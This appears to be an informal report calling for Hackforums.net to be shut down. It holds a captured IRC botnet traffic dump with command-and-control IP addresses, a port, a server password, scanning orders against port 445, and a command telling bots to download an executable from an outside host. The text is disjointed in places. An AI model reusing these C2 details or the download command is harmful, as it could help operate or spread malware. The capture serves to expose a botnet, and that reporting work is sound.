Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services, etc.

I'm not certain what your criteria are for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activities and it should be closed as soon as possible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

115.239.230.73 (IRC botnet hosted in China, Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host       Port Number
115.239.230.73    6943          PASS laorosr
213.251.170.52    80
31.184.237.43     80
98.126.35.112     80

MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...


Hosting information:
http://whois.domaintools.com/115.239.230.73